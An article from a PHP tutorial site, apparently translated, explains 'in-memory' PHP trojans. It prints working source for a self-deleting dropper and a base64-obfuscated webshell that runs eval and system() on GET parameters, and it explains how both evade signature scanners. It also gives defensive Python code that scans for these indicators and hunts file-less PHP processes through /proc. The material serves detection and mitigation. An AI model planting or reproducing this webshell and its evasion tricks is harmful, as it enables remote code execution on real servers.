Information Security 3 min read

In-Memory PHP Trojan: Source Code, Explanation, and Mitigation

This article explains the concept of in‑memory PHP trojans, provides simple obfuscated source code that deletes itself and persists in RAM, discusses their stealth characteristics, and offers a basic mitigation strategy of terminating the process and removing the generated files.

php中文网 Courses

Preface: A memory trojan is a malicious program that runs entirely in RAM without a file on disk, making it highly stealthy, difficult to detect, and hard to eradicate.

In information security the overall posture is only as strong as the weakest link, and the outcome of an attack hinges on the attacker's skill and on how well the malicious code is concealed.

This article does not discuss whether the infection stemmed from arbitrary file upload or a near‑source attack that left malicious code on the production server.

Virus source code (very simple):

<code><?php
// Keep the script from timing out or stopping when the client disconnects
set_time_limit(0);ignore_user_abort(true);
// Delete the script's own file from disk; the code keeps running from memory
@unlink(__FILE__);
// Give the dropped trojan a misleading, legitimate-looking name
$file = './getUserInfo.php';
// Infinite loop keeps the process resident in memory and re-drops the trojan file
// whenever it is missing, pausing 60 seconds between checks
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0='));
 sleep(60);
}
?>
</code>

Dropped trojan body (the decoded payload written to getUserInfo.php):

<code><?php
// The code below disguises the eval keyword and the system() function name
// so that neither string appears literally in the file.
// Equivalent to: eval($_GET['e']);
// 'ZXZhbCgi' decodes to 'eval("' and 'Iik7' decodes to '");'
// (create_function() was removed in PHP 8.0, so this branch only works on PHP 7.x and earlier)
if($e = @$_GET['e']) {
    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
    $func();
}
// Equivalent to: system($_GET['s']);
// stripping every 'x' from the padded string yields the function name 'system'
if($s = @$_GET['s']) {
    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
    $f($s);
}
?>
</code>

Explanation:

The critical code is base64-encoded and the dangerous function names are assembled at runtime, so signature-based scanners that look for literal strings such as eval or system do not match the file.
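A scanner that only greps for literal `eval(` or `system(` misses this sample for exactly the reason given above. The following added example (my own code, not part of the original article) shows the extra work a static scan needs: it flags the structural indicators of the dropper, decodes base64 literals and rescans the decoded text recursively, and resolves `str_replace()` calls whose arguments are all literals to the function name they produce. The indicator list, the regular expressions and the sample input are constructed for this example; the sample reproduces the structure of the two listings on the page, with the inner payload base64-encoded at runtime so it stays readable.

```python
"""Static indicator scan for obfuscated PHP droppers (added example, not from the article)."""
import base64
import re

# Indicator patterns with the reason each one is suspicious.
INDICATORS = [
    (r"@?unlink\s*\(\s*__FILE__\s*\)", "deletes its own file (unlink(__FILE__))"),
    (r"ignore_user_abort\s*\(\s*true\s*\)", "survives client disconnect (ignore_user_abort(true))"),
    (r"set_time_limit\s*\(\s*0\s*\)", "disables the execution time limit (set_time_limit(0))"),
    (r"create_function\s*\(", "builds code at runtime (create_function)"),
    (r"\beval\s*\(", "evaluates dynamic code (eval)"),
    (r"file_put_contents\s*\([^)]*base64_decode", "writes a base64-decoded payload to disk (file_put_contents)"),
]

# Function names that should never be produced by string manipulation in a web app.
DANGEROUS_NAMES = {"system", "exec", "shell_exec", "passthru", "eval", "assert", "popen"}

B64_LITERAL = re.compile(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=]{8,})'\s*\)")
STR_REPLACE_LITERAL = re.compile(
    r"str_replace\s*\(\s*'([^']*)'\s*,\s*'([^']*)'\s*,\s*'([^']*)'\s*\)"
)


def resolve_str_replace_literals(src):
    """Evaluate str_replace() calls whose three arguments are all string literals."""
    return [m.group(3).replace(m.group(1), m.group(2)) for m in STR_REPLACE_LITERAL.finditer(src)]


def scan_php(src, depth=0, max_depth=3):
    """Return a list of (depth, reason) findings; depth > 0 means the finding
    came from text recovered by decoding a base64 literal."""
    findings = [(depth, reason) for pattern, reason in INDICATORS if re.search(pattern, src)]
    for name in resolve_str_replace_literals(src):
        if name in DANGEROUS_NAMES:
            findings.append((depth, f"str_replace() resolves to dangerous function name {name!r}"))
    if depth < max_depth:
        for m in B64_LITERAL.finditer(src):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not text; a real scanner would hash and report the blob
            findings.extend(scan_php(decoded, depth + 1, max_depth))
    return findings


# Constructed sample mirroring the page's two listings (inner payload encoded at runtime).
INNER_PAYLOAD = (
    "<?php\n"
    "if($e = @$_GET['e']) {\n"
    "    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));\n"
    "    $func();\n"
    "}\n"
    "if($s = @$_GET['s']) {\n"
    "    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');\n"
    "    $f($s);\n"
    "}\n"
)
SAMPLE_DROPPER = (
    "<?php\n"
    "set_time_limit(0);ignore_user_abort(true);\n"
    "@unlink(__FILE__);\n"
    "$file = './getUserInfo.php';\n"
    "while(true) {\n"
    "  if(!file_exists($file)) @file_put_contents($file, base64_decode('"
    + base64.b64encode(INNER_PAYLOAD.encode()).decode() + "'));\n"
    "  sleep(60);\n"
    "}\n"
)


def scan_sample():
    """Scan the constructed dropper; used by the demo below."""
    return scan_php(SAMPLE_DROPPER)


if __name__ == "__main__":
    for depth, reason in scan_sample():
        print(f"{'  ' * depth}[depth {depth}] {reason}")
```

The depth column is the useful part of the report: the `eval` indicator only appears at depth 2, because it is hidden inside a base64 literal that is itself inside the base64-encoded payload. A scanner that decodes one layer and stops would still miss it.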

Once executed, the malware deletes its own file and remains resident in memory.

Even if the released trojan is detected and removed, it will recreate the same file.

Solution: Terminate the resident PHP process first, then delete the generated trojan file. Deleting the file alone is not enough, because the process in memory recreates it on its next check.
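Finding the resident process is the hard half of that solution, since there is no file left to point at. The following added example (my own code, not from the article) walks the Linux /proc tree and reports processes that look like a file-less PHP script: a `php` interpreter whose command line names a script that no longer exists, or any process holding a file descriptor whose target is marked `(deleted)`. The /proc root is a parameter so the same logic can run against a constructed fake tree, which the demo builds in a temporary directory; the pid numbers and paths in that tree are made up for the example.

```python
"""Hunt for file-less PHP processes via /proc (added example, not from the article)."""
import os
import tempfile


def find_orphaned_php(proc_root="/proc"):
    """Return [(pid, [evidence, ...]), ...] for processes that look like a
    script running without its file: php argv pointing at a missing script,
    or an open fd whose link target ends in ' (deleted)'."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pdir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pdir, "cmdline"), "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
        except OSError:
            continue  # process exited or is not readable
        evidence = []
        if argv and "php" in os.path.basename(argv[0]):
            for arg in argv[1:]:
                if arg.endswith(".php") and not os.path.exists(arg):
                    evidence.append(f"cmdline script missing: {arg}")
        fd_dir = os.path.join(pdir, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            fds = []  # needs root to read other users' fd tables
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target.endswith(" (deleted)"):
                evidence.append(f"fd {fd} -> {target}")
        if evidence:
            hits.append((int(entry), evidence))
    return hits


def build_fake_proc():
    """Construct a minimal fake /proc tree for the demo (constructed data)."""
    root = tempfile.mkdtemp(prefix="fakeproc_")
    missing_script = os.path.join(root, "webroot", "img.php")  # never created
    # pid 4242: php CLI still running a script that was unlinked, fd 3 still open on it
    bad = os.path.join(root, "4242")
    os.makedirs(os.path.join(bad, "fd"))
    with open(os.path.join(bad, "cmdline"), "wb") as f:
        f.write(b"php\0" + missing_script.encode() + b"\0")
    os.symlink(missing_script + " (deleted)", os.path.join(bad, "fd", "3"))
    # pid 4243: an idle php-fpm worker with nothing suspicious
    good = os.path.join(root, "4243")
    os.makedirs(os.path.join(good, "fd"))
    with open(os.path.join(good, "cmdline"), "wb") as f:
        f.write(b"php-fpm: pool www\0")
    os.makedirs(os.path.join(root, "self"))  # non-numeric entry, must be skipped
    return root


def demo():
    """Run the hunt against the constructed tree."""
    return find_orphaned_php(build_fake_proc())


if __name__ == "__main__":
    for pid, evidence in demo():
        print(f"pid {pid}:")
        for line in evidence:
            print(f"  {line}")
```

Two caveats for real use. Reading another user's `fd` directory requires root, so run the hunt as root or as the web server user. And when the dropper runs inside php-fpm or mod_php rather than the CLI, the worker's command line does not name the script and the file handle is closed once the script is compiled, so the fd check finds nothing; there the signals are a worker stuck in one request for far longer than normal (php-fpm's status page lists per-worker request duration) and, for the loop as originally listed without a pause, a worker pinned at full CPU. Once the pid is known, kill it and only then remove getUserInfo.php.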

Tags: PHP, information security, code obfuscation, malware, memory trojan

Written by php中文网 Courses

php中文网's platform for the latest courses and technical articles, helping PHP learners advance quickly.